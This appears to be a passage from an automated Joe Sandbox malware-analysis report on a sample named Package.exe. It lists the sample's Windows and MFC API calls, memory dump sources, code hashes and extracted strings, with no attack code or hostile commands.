                                                                          • #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A9B
                                                                          • #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AA6
                                                                          • #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #609$#693
                                                                          • String ID:
                                                                          • API String ID: 2192965535-0
                                                                          • Opcode ID: 572b1ce18a2c58596f160bef650ca954490cf96d35471924bbbc5918a3e2e5d1
                                                                          • Instruction ID: ad377b74d2f0fa47a32304e9d9935882ed3d5bcf9c62e69f253d24dcdf8e91a6
                                                                          • Opcode Fuzzy Hash: 572b1ce18a2c58596f160bef650ca954490cf96d35471924bbbc5918a3e2e5d1
                                                                          • Instruction Fuzzy Hash: 3FE0BF35184616DBC274EB30D4916EAF7A2FF54351F51062DB0AB035E1AF706B89CB70
                                                                          Strings
                                                                          • C:\Windows\Temp\Package.exe, xrefs: 6E2F7152
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: C:\Windows\Temp\Package.exe
                                                                          • API String ID: 0-234654675
                                                                          • Opcode ID: 3f73dfd17054b5027a438bace37b8ea922b9ed17aa1537ca1c541d233df3932f
                                                                          • Instruction ID: 6866b5f5a1fa7d623b70d375750bb5f06b4d0310d14fabf1dba228e061442954
                                                                          • Opcode Fuzzy Hash: 3f73dfd17054b5027a438bace37b8ea922b9ed17aa1537ca1c541d233df3932f
                                                                          • Instruction Fuzzy Hash: 40218E712A420EEF97009EE5DC8098BF7AFAF053697088928E925C7180DB30ED178760
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7763BC5F,?,?,00000000,6E2FEC9D,000000FF,?,6E2F418D,00000000,?,6E2F4161,6E2F1014), ref: 6E2F4228
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E2F423A
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,6E2FEC9D,000000FF,?,6E2F418D,00000000,?,6E2F4161,6E2F1014), ref: 6E2F425C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 2ed8d8f07e4bc21f8442af753882e3f4c59055b83cb77c8f9b65e6a99e83444b
                                                                          • Instruction ID: 6545d233b8679dcb78ceca2794323986f6af699870f86a12e4545ed0b6e6792c
                                                                          • Opcode Fuzzy Hash: 2ed8d8f07e4bc21f8442af753882e3f4c59055b83cb77c8f9b65e6a99e83444b
                                                                          • Instruction Fuzzy Hash: 9401AC31994A2DEBEF018F90DC18BAFBBBAFB45721F104529F822A2384D7749901CA50
                                                                          APIs
                                                                          • #1143.MFC42U(00000093,0000000E,00000093), ref: 00D2B31D
                                                                          • LoadIconW.USER32(00000000,00000093), ref: 00D2B323
                                                                          • #1165.MFC42U ref: 00D2B32B
                                                                            • Part of subcall function 00D2B421: #1172.MFC42U(?,00D2B338), ref: 00D2B424
                                                                          • ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 00D2B34B
                                                                          Strings
                                                                          • Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 00D2B344
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1143#1165#1172AboutIconLoadShell
                                                                          • String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
                                                                          • API String ID: 29937196-3714244911
                                                                          • Opcode ID: c0001f7b2b5f645597ceddbb0db9400edc87c80af203321a2bc78a63d08e78b8
                                                                          • Instruction ID: be9596169ac061145712e64efbdb7860a15417622cde7dfd9509733160a5d962
                                                                          • Opcode Fuzzy Hash: c0001f7b2b5f645597ceddbb0db9400edc87c80af203321a2bc78a63d08e78b8
                                                                          • Instruction Fuzzy Hash: B4E086356013206BD6243772FC1EE5B2B2DDFA2775F1504267442E3252D7A8C9428570
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf
                                                                          • String ID: %s ($%08lX)$range: %s ($%08lX)$severity: %s, facility: %s ($%08lX)
                                                                          • API String ID: 2111968516-3060768123
                                                                          • Opcode ID: 421e0c1f0afa9162ea05ade29c4cebc8af3e6aa7011225f4539348e699c33c4b
                                                                          • Instruction ID: ee3a253cbbd0de29486504a331a90f0708fe014d0f91f36c58f602d17758ec14
                                                                          • Opcode Fuzzy Hash: 421e0c1f0afa9162ea05ade29c4cebc8af3e6aa7011225f4539348e699c33c4b
                                                                          • Instruction Fuzzy Hash: 10F0EC32A423307B96002B683C02CBB7A4ECD63752F4C0021FE44F7342CA909E12DAFA
                                                                          APIs
                                                                          • #1143.MFC42U(00000093,0000000E,00000093), ref: 00D2B31D
                                                                          • LoadIconW.USER32(00000000,00000093), ref: 00D2B323
                                                                          • #1165.MFC42U ref: 00D2B32B
                                                                            • Part of subcall function 00D2B421: #1172.MFC42U(?,00D2B338), ref: 00D2B424
                                                                          • ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 00D2B34B
                                                                          Strings
                                                                          • Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 00D2B344
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1143#1165#1172AboutIconLoadShell
                                                                          • String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
                                                                          • API String ID: 29937196-3714244911
                                                                          • Opcode ID: 70f9d2e3c770333b870a6e8131a7e15a3d3da1daca5c45faee23c70bb597dc4b
                                                                          • Instruction ID: 46a686780f61c847832b943f4da3d70df994b472551208fd16f8e8754a5cfa90
                                                                          • Opcode Fuzzy Hash: 70f9d2e3c770333b870a6e8131a7e15a3d3da1daca5c45faee23c70bb597dc4b
                                                                          • Instruction Fuzzy Hash: 4CE04F756003206BD7247771FD1AE6B2B2DDFA2775B060466B446E7292DBA4C84286B0
                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(OLE32.DLL,?,00D2E204,?,?,?), ref: 00D3DB2B
                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 00D3DB3D
                                                                          • FreeLibrary.KERNEL32(00000000,?,00D2E204,?,?,?), ref: 00D3DB52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressFreeLoadProc
                                                                          • String ID: CoInitializeEx$OLE32.DLL
                                                                          • API String ID: 145871493-3669712014
                                                                          • Opcode ID: 4aab8a2e9d3e972cec39519f11d68b3e97f9c2c0de8dcd3a284ca0294c08db7a
                                                                          • Instruction ID: 3f42983720836e3e3a78a7db633f3d4f894d440083d5111ea2fc1b464fc44bc5
                                                                          • Opcode Fuzzy Hash: 4aab8a2e9d3e972cec39519f11d68b3e97f9c2c0de8dcd3a284ca0294c08db7a
                                                                          • Instruction Fuzzy Hash: D8E04F395417A09FDB206F58BC0C78676A6BB23727F090204E510D23A0CB748644CA75
                                                                          APIs
                                                                          • __alloca_probe_16.LIBCMT ref: 6E2FA76A
                                                                          • __alloca_probe_16.LIBCMT ref: 6E2FA833
                                                                          • __freea.LIBCMT ref: 6E2FA89A
                                                                            • Part of subcall function 6E2F9163: HeapAlloc.KERNEL32(00000000,6E2F76AF,6E2F8E7D,?,6E2F76AF,00000220,?,?,6E2F8E7D), ref: 6E2F9195
                                                                          • __freea.LIBCMT ref: 6E2FA8AD
                                                                          • __freea.LIBCMT ref: 6E2FA8BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 1096550386-0
                                                                          • Opcode ID: c5e1c4968f0a488f70025d0daef80f7b6c2a99faf3dd93cd43f71a62ab8668fa
                                                                          • Instruction ID: 51595ebe8193635c3ac4eab645c371c1e8ae413c01fa4dda21f0c7d7f480429c
                                                                          • Opcode Fuzzy Hash: c5e1c4968f0a488f70025d0daef80f7b6c2a99faf3dd93cd43f71a62ab8668fa
                                                                          • Instruction Fuzzy Hash: 2951BFB6A9120FEFEB054EE5CC80EABB6AFEF84755B110528FC2496150E7B0CC138660
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                          • String ID:
                                                                          • API String ID: 3136044242-0
                                                                          • Opcode ID: c625b049ef13aed4ffa7aaf447b462d264e2392c74cd9da55404f563ee6f1465
                                                                          • Instruction ID: 35416e6a67d8d7e5403066d05ec31deb0774dd525f438238564ad72ce5b5ed60
                                                                          • Opcode Fuzzy Hash: c625b049ef13aed4ffa7aaf447b462d264e2392c74cd9da55404f563ee6f1465
                                                                          • Instruction Fuzzy Hash: 5321A5B1D8026EEFDB114ED5C840AAEBA7FDB81695F804519F81466216D7318D8B8B90
                                                                          APIs
                                                                          • #2371.MFC42U ref: 00D30917
                                                                          • #6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 00D3096E
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D30939
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
                                                                            • Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D3098D
                                                                          • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00D309BF
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6193ClientRectScreenWindow$#2371#3133
                                                                          • String ID:
                                                                          • API String ID: 3329109363-0
                                                                          • Opcode ID: 97b3145adcf005e039081d407af3dcb70182a943c9643da1255e76ba7162252e
                                                                          • Instruction ID: c9d63d71df4a8ed7ac99748d50d0848e31bcbec0db6959e65b85edfb0d7d9a1f
                                                                          • Opcode Fuzzy Hash: 97b3145adcf005e039081d407af3dcb70182a943c9643da1255e76ba7162252e
                                                                          • Instruction Fuzzy Hash: 42212E71A00209ABDB14DF78CD45FEEB7B9EF88714F084219B515E72D1DB30AA05CA74
                                                                          APIs
                                                                          • #2371.MFC42U ref: 00D2C3E7
                                                                          • #6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 00D2C43E
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2C409
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
                                                                            • Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2C45D
                                                                          • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00D2C48F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6193ClientRectScreenWindow$#2371#3133
                                                                          • String ID:
                                                                          • API String ID: 3329109363-0
                                                                          • Opcode ID: a16eb351c8f602e2dfaf08ec99fc8cd2abc5bd0fab638eb972069a85083eeba0
                                                                          • Instruction ID: a8cdbd231bb580d54d6257fe1a4efcbec4a2171aaacfae28566b3fbf468d701e
                                                                          • Opcode Fuzzy Hash: a16eb351c8f602e2dfaf08ec99fc8cd2abc5bd0fab638eb972069a85083eeba0
                                                                          • Instruction Fuzzy Hash: DC216B71600219ABDB24DFB8DD45FEFB7B9EF88714F144218B525A72C1DB30AE058A70
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$#4692FreeLibrariesUnused
                                                                          • String ID:
                                                                          • API String ID: 1635327766-0
                                                                          • Opcode ID: a21ade753210b66a59082d15129ebb99286c8a5b26c97ee0dfc07852d43a3915
                                                                          • Instruction ID: 706ac799114016b63922896446beeef21261e63dd504d59e663e607ffdc18675
                                                                          • Opcode Fuzzy Hash: a21ade753210b66a59082d15129ebb99286c8a5b26c97ee0dfc07852d43a3915
                                                                          • Instruction Fuzzy Hash: 5501D13A400355DBC320EF6CF849929B7A5EFAB731B24022BE408C7760CBB099818E75
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D30B85
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00D2DF45), ref: 00D30B8C
                                                                            • Part of subcall function 00D30BBB: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D30BE4
                                                                            • Part of subcall function 00D30BBB: #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00D30C33
                                                                            • Part of subcall function 00D30BBB: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D30C46
                                                                            • Part of subcall function 00D30BBB: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D30C57
                                                                          • #6330.MFC42U(00000000,?,?,?,?,00D2DF45), ref: 00D30B9C
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D30BA7
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00D2DF45), ref: 00D30BAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$MessageSend$Load$#2634#6330
                                                                          • String ID:
                                                                          • API String ID: 3859525188-0
                                                                          • Opcode ID: 4c05e6c171fa50327f9ed7315e1f332ef13e084b1e7938ffda489ab99e8c6d85
                                                                          • Instruction ID: fb565334452a0ae7dbc30286f094851be7c15bb32085ad678860231fb4746944
                                                                          • Opcode Fuzzy Hash: 4c05e6c171fa50327f9ed7315e1f332ef13e084b1e7938ffda489ab99e8c6d85
                                                                          • Instruction Fuzzy Hash: 39F0A0366013246B87016FE59C4DE9B7F9DEF877517000426FA16DB242CBB8980786F0
                                                                          APIs
                                                                          • #810.MFC42U(?,00D2D83D), ref: 00D2D7B3
                                                                          • #795.MFC42U(?,00D2D83D), ref: 00D2D7BE
                                                                          • #795.MFC42U(?,00D2D83D), ref: 00D2D7C9
                                                                          • #795.MFC42U(?,00D2D83D), ref: 00D2D7D4
                                                                          • #804.MFC42U(?,00D2D83D), ref: 00D2D7DF
                                                                            • Part of subcall function 00D394F7: #810.MFC42U(?,00D2D7EF,?,00D2D83D), ref: 00D39505
                                                                            • Part of subcall function 00D2C9F5: #800.MFC42U(?,00D2CA4D), ref: 00D2CA06
                                                                            • Part of subcall function 00D2C9F5: #800.MFC42U(?,00D2CA4D), ref: 00D2CA11
                                                                            • Part of subcall function 00D2C9F5: #656.MFC42U(?,00D2CA4D), ref: 00D2CA1C
                                                                            • Part of subcall function 00D2C9F5: #609.MFC42U(?,00D2CA4D), ref: 00D2CA24
                                                                            • Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F47D
                                                                            • Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F488
                                                                            • Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F493
                                                                            • Part of subcall function 00D2F46C: #800.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F49E
                                                                            • Part of subcall function 00D2F46C: #616.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4A9
                                                                            • Part of subcall function 00D2F46C: #656.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4B4
                                                                            • Part of subcall function 00D2F46C: #609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4BF
                                                                            • Part of subcall function 00D2F46C: #609.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4CA
                                                                            • Part of subcall function 00D2F46C: #804.MFC42U(?,00D2D805,?,00D2D83D), ref: 00D2F4D2
                                                                            • Part of subcall function 00D30A74: #693.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A85
                                                                            • Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A90
                                                                            • Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A9B
                                                                            • Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AA6
                                                                            • Part of subcall function 00D30A74: #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30AAE
                                                                            • Part of subcall function 00D2C53F: #693.MFC42U(?,00D2C5BD), ref: 00D2C550
                                                                            • Part of subcall function 00D2C53F: #609.MFC42U(?,00D2C5BD), ref: 00D2C55B
                                                                            • Part of subcall function 00D2C53F: #609.MFC42U(?,00D2C5BD), ref: 00D2C566
                                                                            • Part of subcall function 00D2C53F: #609.MFC42U(?,00D2C5BD), ref: 00D2C56E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #609$#800$#795$#656#693#804#810$#616
                                                                          • String ID:
                                                                          • API String ID: 1443703491-0
                                                                          • Opcode ID: a4ab8571306499fa6393f30e238bc9cf0612b05e0c2f700ad9bc77b5b011e408
                                                                          • Instruction ID: 7474ebd397c26c1e5c5be86040e4f2317b16b8a9d3f753f1ae2fc7e06cb3eec4
                                                                          • Opcode Fuzzy Hash: a4ab8571306499fa6393f30e238bc9cf0612b05e0c2f700ad9bc77b5b011e408
                                                                          • Instruction Fuzzy Hash: 90F0AF314146158AC238FB30E8616EAB3A1FF64354F90496DA0AB021D2AF647909CFB0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#609#656
                                                                          • String ID:
                                                                          • API String ID: 1737153938-0
                                                                          • Opcode ID: b32241402a0376f540a3c18c5c3ae481c578d56d80a0b2e5545cb78a974585b5
                                                                          • Instruction ID: 82073ce8058887c44152e13287adc611ea65e2556a1e1ff010bd1360eadb829c
                                                                          • Opcode Fuzzy Hash: b32241402a0376f540a3c18c5c3ae481c578d56d80a0b2e5545cb78a974585b5
                                                                          • Instruction Fuzzy Hash: BCE0EC36080611C7C235EB20E592AEAB792EF64351F50092EB4E7035D1AF706A45CB70
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: C/n
                                                                          • API String ID: 0-1270626185
                                                                          • Opcode ID: d432f4aa3e4d23d3deb1605d2172d892d7fe71a8ccddbd85d7d4394854899002
                                                                          • Instruction ID: b0a22474b6e5def5b16c024fce782a28abd1ba316b8bcac09cbab8b7824b9282
                                                                          • Opcode Fuzzy Hash: d432f4aa3e4d23d3deb1605d2172d892d7fe71a8ccddbd85d7d4394854899002
                                                                          • Instruction Fuzzy Hash: 20116D752E420DDFD7016BE98884BCEF7AB9F0A71AF144448D4069B385DBB4CD4787A1
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6E2F2E65,00000000,?,00000001,?,?,?,6E2F2F54,00000001,FlsFree,6E2FFBE0,FlsFree), ref: 6E2F2EC1
                                                                          • GetLastError.KERNEL32(?,6E2F2E65,00000000,?,00000001,?,?,?,6E2F2F54,00000001,FlsFree,6E2FFBE0,FlsFree,00000000,?,6E2F2431), ref: 6E2F2ECB
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6E2F2EF3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
